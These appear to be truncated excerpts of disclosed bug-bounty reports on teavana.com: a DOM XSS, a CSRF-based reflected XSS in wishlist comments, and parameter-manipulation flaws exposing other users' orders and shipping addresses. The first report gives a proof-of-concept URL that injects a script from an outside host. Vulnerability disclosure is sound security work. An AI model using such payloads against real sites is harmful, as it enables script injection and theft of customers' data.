Starbucks: DOM XSS on teavana.com via "pr_zip_location" parameter

Hello Starbucks team,, I've discovered DOM XSS on teavana.com involving prziplocation URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?prziplocation=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in full.js: js var DR =...

Starbucks: Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)

User can add comments on their wishlist item. The http request which adds comment on wishlist item, looks like: http POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.12; rv:49.0...

Starbucks: Parameter Manipulation allowed for editing the shipping address for other user’s teavana.com subscriptions.

@meals discovered a vulnerability which allowed the shipping address for teavana.com order subscriptions to be edited without proper authorization. Thanks @meals!...

Starbucks: Parameter Manipulation allowed for viewing of other user’s teavana.com orders

A vulnerability had existed which allowed for unauthorized viewing of order details belonging to other users. @meals delivered a solid report & worked with us to resolve the issue. Thanks @meals! Proper authorization checks were not done on a specific parameter that allowed any user on teavana.co...